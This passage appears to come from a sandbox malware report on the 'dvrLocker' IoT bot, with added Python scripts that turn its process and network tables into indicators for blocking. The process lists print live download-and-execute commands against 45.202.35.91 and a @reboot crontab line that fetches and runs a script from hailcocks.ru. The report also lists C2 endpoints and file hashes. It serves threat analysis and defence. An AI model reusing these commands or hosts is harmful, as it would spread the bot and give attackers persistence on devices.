/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf x86]
Network
| Country | Destination | Domain | Proto |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| DE | 202.61.197.122:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:23655 | kingstonwikkerink.dyn | tcp |
| CN | 43.226.79.41:62371 | N/A | udp |
Files
/tmp/lib/dvrLocker
| MD5 | 4ad582d49f505bfab7de84881998685b |
| SHA1 | 5f09f4baed114b594729ded91e2c4d263f0e2754 |
| SHA256 | b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1 |
| SHA512 | 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4 |
/tmp/lib/dvrLocker
| MD5 | 559f129d380ad1cfb60792c6b2dc3d32 |
| SHA1 | 3997a0fc0bd5958783f1751364ec407c5b170adc |
| SHA256 | fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d |
| SHA512 | 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112 |
/var/spool/cron/crontabs/tmp.cK7Kfe
| MD5 | e728bc24eeb3365830019d50d1e8e05c |
| SHA1 | b25cfd9ccb191711a43aa90e55eeea2f1e31ea0f |
| SHA256 | 68c667810359171e53c51f4d00de87821381491fbcaf7b97784cdb0fad788966 |
| SHA512 | 64ac0e01cd92073612b5e679daea6fcfc049f7e651047ac0d187387752fbf66551203e14e16fe6986f8ce7e53f3c9a3728dcbb996cdfdfcfeb4248328056ba73 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 08:41
Reported
2024-11-09 08:44
Platform
debian9-mipsel-20240611-en
Max time kernel
60s
Max time network
154s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/lib/dvrLocker | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 80.152.203.134 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.u40wTl | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/busybox telentd | /tmp/lib/dvrLocker | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/827/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/829/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/835/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/837/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/849/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/873/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/920/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/924/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/926/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/822/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/856/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/862/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/828/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/860/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/824/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/901/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/891/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/2/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/876/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/866/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/854/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/881/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/899/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/927/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/825/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/838/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/908/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/917/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/913/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/819/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/836/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/869/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/883/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/896/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/904/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/lib/dvrLocker | /tmp/l.sh | N/A |
Processes
/tmp/l.sh
[/tmp/l.sh]
/bin/ls
[ls -l /proc/1/exe]
/bin/ls
[ls -l /proc/10/exe]
/bin/ls
[ls -l /proc/105/exe]
/bin/ls
[ls -l /proc/11/exe]
/bin/ls
[ls -l /proc/113/exe]
/bin/ls
[ls -l /proc/114/exe]
/bin/ls
[ls -l /proc/12/exe]
/bin/ls
[ls -l /proc/13/exe]
/bin/ls
[ls -l /proc/14/exe]
/bin/ls
[ls -l /proc/143/exe]
/bin/ls
[ls -l /proc/147/exe]
/bin/ls
[ls -l /proc/15/exe]
/bin/ls
[ls -l /proc/16/exe]
/bin/ls
[ls -l /proc/166/exe]
/bin/ls
[ls -l /proc/17/exe]
/bin/ls
[ls -l /proc/18/exe]
/bin/ls
[ls -l /proc/19/exe]
/bin/ls
[ls -l /proc/2/exe]
/bin/ls
[ls -l /proc/20/exe]
/bin/ls
[ls -l /proc/21/exe]
/bin/ls
[ls -l /proc/22/exe]
/bin/ls
[ls -l /proc/23/exe]
/bin/ls
[ls -l /proc/236/exe]
/bin/ls
[ls -l /proc/24/exe]
/bin/ls
[ls -l /proc/3/exe]
/bin/ls
[ls -l /proc/327/exe]
/bin/ls
[ls -l /proc/329/exe]
/bin/ls
[ls -l /proc/331/exe]
/bin/ls
[ls -l /proc/335/exe]
/bin/ls
[ls -l /proc/340/exe]
/bin/ls
[ls -l /proc/36/exe]
/bin/ls
[ls -l /proc/37/exe]
/bin/ls
[ls -l /proc/379/exe]
/bin/ls
[ls -l /proc/380/exe]
/bin/ls
[ls -l /proc/384/exe]
/bin/ls
[ls -l /proc/4/exe]
/bin/ls
[ls -l /proc/425/exe]
/bin/ls
[ls -l /proc/5/exe]
/bin/ls
[ls -l /proc/6/exe]
/bin/ls
[ls -l /proc/670/exe]
/bin/ls
[ls -l /proc/673/exe]
/bin/ls
[ls -l /proc/677/exe]
/bin/ls
[ls -l /proc/678/exe]
/bin/ls
[ls -l /proc/684/exe]
/bin/ls
[ls -l /proc/7/exe]
/bin/ls
[ls -l /proc/70/exe]
/bin/ls
[ls -l /proc/700/exe]
/bin/ls
[ls -l /proc/701/exe]
/bin/ls
[ls -l /proc/703/exe]
/bin/ls
[ls -l /proc/704/exe]
/bin/ls
[ls -l /proc/706/exe]
/bin/ls
[ls -l /proc/707/exe]
/bin/ls
[ls -l /proc/708/exe]
/bin/ls
[ls -l /proc/71/exe]
/bin/ls
[ls -l /proc/72/exe]
/bin/ls
[ls -l /proc/73/exe]
/bin/ls
[ls -l /proc/74/exe]
/bin/ls
[ls -l /proc/75/exe]
/bin/ls
[ls -l /proc/76/exe]
/bin/ls
[ls -l /proc/77/exe]
/bin/ls
[ls -l /proc/78/exe]
/bin/ls
[ls -l /proc/8/exe]
/bin/ls
[ls -l /proc/81/exe]
/bin/ls
[ls -l /proc/83/exe]
/bin/ls
[ls -l /proc/9/exe]
/bin/rm
[rm -rf /tmp/lib/]
/bin/rm
[rm -rf /tmp/lib/dvrLocker]
/bin/mkdir
[mkdir /tmp/lib/]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab -]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf x86]
/bin/rm
[rm -rf /mnt/dvrLocker]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf x86]
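The process lists of behavioral1, behavioral3 and behavioral4 above all show the same dropper loop: a sweep of `ls -l /proc/<pid>/exe`, then for each architecture name (mpsl, mips, arm, arm5, ppc, arm7, arm6, x86) a `wget http://45.202.35.91/<arch> -O -` streamed into `dvrLocker`, `chmod 777`, execution as `./dvrLocker tplink.new` from `/tmp/lib/` and then `/mnt/`, `rm -rf <arch>`, with a `@reboot` crontab entry added part-way through. The script below is an added example, not part of the report or of the sample: it parses the report's two-line-per-process format and reduces a listing to stages and IOCs. `SAMPLE` is a constructed excerpt of the lists above, and `WRITABLE_DIRS` is an assumed set of drop locations.

```python
"""Reduce a sandbox "Processes" listing (alternating image path / [cmdline] lines)
to dropper stages and the IOCs they carry. Added example, not the report's code."""
import re

# Constructed excerpt of the report's behavioral1/behavioral4 process lists.
SAMPLE = """\
/tmp/l.sh
[/tmp/l.sh]
/bin/ls
[ls -l /proc/1/exe]
/bin/ls
[ls -l /proc/10/exe]
/bin/rm
[rm -rf /tmp/lib/]
/bin/mkdir
[mkdir /tmp/lib/]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf x86]
"""

URL_RE = re.compile(r"https?://[^\s\"';)]+")
PROC_EXE_RE = re.compile(r"^ls -l /proc/\d+/exe$")
# Assumed: world-writable locations a bot typically drops into.
WRITABLE_DIRS = ("/tmp/", "/mnt/", "/var/tmp/", "/dev/shm/")


def parse_process_list(text):
    """Return [(image, cmdline), ...]; strips the [] the report wraps cmdlines in."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    procs = []
    for i in range(0, len(lines) - 1, 2):
        image, cmd = lines[i], lines[i + 1]
        if cmd.startswith("[") and cmd.endswith("]"):
            cmd = cmd[1:-1]
        procs.append((image, cmd))
    return procs


def _add_unique(seq, item):
    if item not in seq:
        seq.append(item)


def summarize(procs):
    """Bucket each process into a dropper stage and collect the IOCs it carries."""
    s = {
        "proc_enum": 0,            # ls -l /proc/<pid>/exe sweeps
        "payload_urls": [],        # wget ... -O - (payload streamed to stdout)
        "payload_tags": [],        # last URL path component = architecture name
        "chmod_777": 0,
        "cron_persist": [],        # URLs baked into the @reboot crontab entry
        "cleanup": [],             # rm -rf targets
        "exec_from_writable": [],  # images launched from /tmp, /mnt, ...
    }
    for image, cmd in procs:
        argv = cmd.split()
        if PROC_EXE_RE.match(cmd):
            s["proc_enum"] += 1
        elif argv[:1] == ["wget"] and argv[-2:] == ["-O", "-"]:
            for url in URL_RE.findall(cmd):
                _add_unique(s["payload_urls"], url)
                _add_unique(s["payload_tags"], url.rsplit("/", 1)[-1])
        elif argv[:2] == ["chmod", "777"]:
            s["chmod_777"] += 1
        elif cmd.startswith("sh -c") and "@reboot" in cmd and "| crontab -" in cmd:
            for url in URL_RE.findall(cmd):
                _add_unique(s["cron_persist"], url)
        elif argv[:2] == ["rm", "-rf"]:
            s["cleanup"].extend(argv[2:])
        if image.startswith(WRITABLE_DIRS):
            _add_unique(s["exec_from_writable"], image)
    return s


def is_dropper(s):
    """Heuristic verdict: more than one architecture fetched to stdout, chmod 777,
    execution out of a writable directory and cron persistence, all together."""
    return (len(s["payload_tags"]) > 1 and s["chmod_777"] > 0
            and bool(s["exec_from_writable"]) and bool(s["cron_persist"]))


if __name__ == "__main__":
    summary = summarize(parse_process_list(SAMPLE))
    for key, value in summary.items():
        print(f"{key:20} {value}")
    print("dropper:", is_dropper(summary))
```

Run on the full lists above, the summary yields the eight architecture tags, both drop directories and the single persistence URL, which is the set an analyst needs for blocking: the payload host, the cron staging host and the two file paths. The `tplink.new` argument passed to every `dvrLocker` launch is preserved in the cmdline and is worth keeping as a hunting string, since it is how the bot records its infection vector.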
Network
| Country | Destination | Domain | Proto |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| DE | 80.152.203.134:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:20155 | kingstonwikkerink.dyn | tcp |
| CN | 43.226.79.41:62371 | N/A | udp |
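Across the three Network tables the bot resolves one name, `kingstonwikkerink.dyn`, through four different port-53 servers that are not the sandbox resolver (the "Unexpected DNS network traffic destination" signature above), and the name answers with a different TCP endpoint in each run (217.28.130.41:11973, 91.149.238.18:8414, 193.233.193.45:23655, 193.233.193.45:20155). `.dyn` is not delegated in the ICANN root; it is one of the TLDs served by the OpenNIC alternative root, which is why the sample has to carry its own resolver addresses. The triage below is an added example, not part of the report: it tags each row of the tables and pivots on the hostname rather than the IP. `RECORDS` is copied from the tables with duplicates dropped; `SYSTEM_RESOLVERS` (a placeholder sandbox resolver) and the partial `ALT_ROOT_TLDS` list are assumptions.

```python
"""Tag sandbox network rows: DNS to non-system resolvers, alternative-root TLDs,
C2 candidates and IP-literal HTTP. Added example, not the report's code."""
import ipaddress

# (country, destination, domain, proto) rows from the report's three Network tables.
RECORDS = [
    ("UA", "45.202.35.91:80", "45.202.35.91", "tcp"),
    ("DE", "152.53.15.127:53", "kingstonwikkerink.dyn", "udp"),
    ("US", "217.28.130.41:11973", "kingstonwikkerink.dyn", "tcp"),
    ("US", "168.235.111.72:53", "kingstonwikkerink.dyn", "udp"),
    ("GB", "91.149.238.18:8414", "kingstonwikkerink.dyn", "tcp"),
    ("CN", "43.226.79.41:62371", "", "udp"),
    ("DE", "202.61.197.122:53", "kingstonwikkerink.dyn", "udp"),
    ("HK", "193.233.193.45:23655", "kingstonwikkerink.dyn", "tcp"),
    ("DE", "80.152.203.134:53", "kingstonwikkerink.dyn", "udp"),
    ("HK", "193.233.193.45:20155", "kingstonwikkerink.dyn", "tcp"),
]

# Assumed: the resolver the sandbox hands out. Anything else on :53 is the
# sample bypassing the system resolver with its own hard-coded servers.
SYSTEM_RESOLVERS = {"10.0.0.53"}

# Assumed partial list of TLDs that exist only in the OpenNIC alternative root.
ALT_ROOT_TLDS = {"dyn", "geek", "libre", "pirate", "bbs", "chan", "indy", "oss", "null", "parody"}


def is_ip_literal(name):
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def split_dst(dst):
    host, port = dst.rsplit(":", 1)
    return host, int(port)


def classify(record, system_resolvers=SYSTEM_RESOLVERS):
    """Return the set of tags one (country, dst, domain, proto) row earns."""
    _country, dst, domain, proto = record
    ip, port = split_dst(dst)
    tags = set()
    if port == 53 and ip not in system_resolvers:
        tags.add("dns_to_unconfigured_resolver")
    if domain and not is_ip_literal(domain):
        if domain.rsplit(".", 1)[-1].lower() in ALT_ROOT_TLDS:
            tags.add("alt_root_tld")
        if proto == "tcp" and port not in (53, 80, 443):
            tags.add("c2_candidate")
    elif domain and proto == "tcp" and port in (80, 443):
        tags.add("http_to_ip_literal")  # payload fetch by bare IP, no name at all
    if not domain and proto == "udp" and port != 53:
        tags.add("udp_no_name")  # no preceding lookup; keep for manual review
    return tags


def triage(records, system_resolvers=SYSTEM_RESOLVERS):
    """Aggregate tags into blocklist-ready sets, sorted for stable output."""
    out = {"rogue_resolvers": set(), "alt_root_domains": set(), "c2_endpoints": set(),
           "payload_hosts": set(), "unnamed_udp": set()}
    for rec in records:
        tags = classify(rec, system_resolvers)
        _country, dst, domain, _proto = rec
        ip, _port = split_dst(dst)
        if "dns_to_unconfigured_resolver" in tags:
            out["rogue_resolvers"].add(ip)
        if "alt_root_tld" in tags:
            out["alt_root_domains"].add(domain)
        if "c2_candidate" in tags:
            out["c2_endpoints"].add(dst)
        if "http_to_ip_literal" in tags:
            out["payload_hosts"].add(dst)
        if "udp_no_name" in tags:
            out["unnamed_udp"].add(dst)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for key, value in triage(RECORDS).items():
        print(f"{key:18} {value}")
```

The output makes the blocking decision concrete: four C2 endpoints for one name means an IP blocklist would have been stale by the third run, while a rule that drops outbound UDP/53 to anything but the organisation's resolvers, or that alerts on queries for non-ICANN TLDs, catches the bot before it learns where its C2 is. The 43.226.79.41:62371 UDP row carries no name and cannot be classified from the table alone, so it is kept aside rather than forced into a bucket.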
Files
/tmp/lib/dvrLocker
| MD5 | 4ad582d49f505bfab7de84881998685b |
| SHA1 | 5f09f4baed114b594729ded91e2c4d263f0e2754 |
| SHA256 | b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1 |
| SHA512 | 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4 |
/var/spool/cron/crontabs/tmp.u40wTl
| MD5 | 8cd195f9cc1ac87a6d7e9413b64538d9 |
| SHA1 | 9e110eaec931ddff0d54fa3372efd7b8c089975c |
| SHA256 | 8cb497497f0f07ff2bca1cf7c4fcecad4c5f2a942fa86a8cdf9b1d621f96dd68 |
| SHA512 | 2e70f0d3e836619adffa3dbf0da481f42e737cba59a83418e387a34fe7ce781eef50c1cdba4e166c1f87ae237817479b474e53702d7e9da746c22cbb4c690652 |